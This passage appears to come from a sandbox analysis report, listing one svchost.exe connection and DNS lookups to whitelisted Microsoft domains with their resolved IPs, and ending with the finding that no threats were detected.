1032 | svchost.exe | 23.37.9.150:443 | go.microsoft.com | AKAMAI-AS | PH | unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 23.216.155.114
  • 23.216.155.66
whitelisted
www.microsoft.com
  • 23.37.9.217
whitelisted
login.live.com
  • 20.190.160.17
  • 40.126.32.136
  • 40.126.32.68
  • 40.126.32.134
  • 20.190.160.22
  • 20.190.160.14
  • 40.126.32.140
  • 40.126.32.72
whitelisted
go.microsoft.com
  • 23.37.9.150
whitelisted
client.wns.windows.com
  • 40.113.103.199
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
fd.api.iris.microsoft.com
  • 20.223.35.26
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted

Threats

No threats detected
No debug info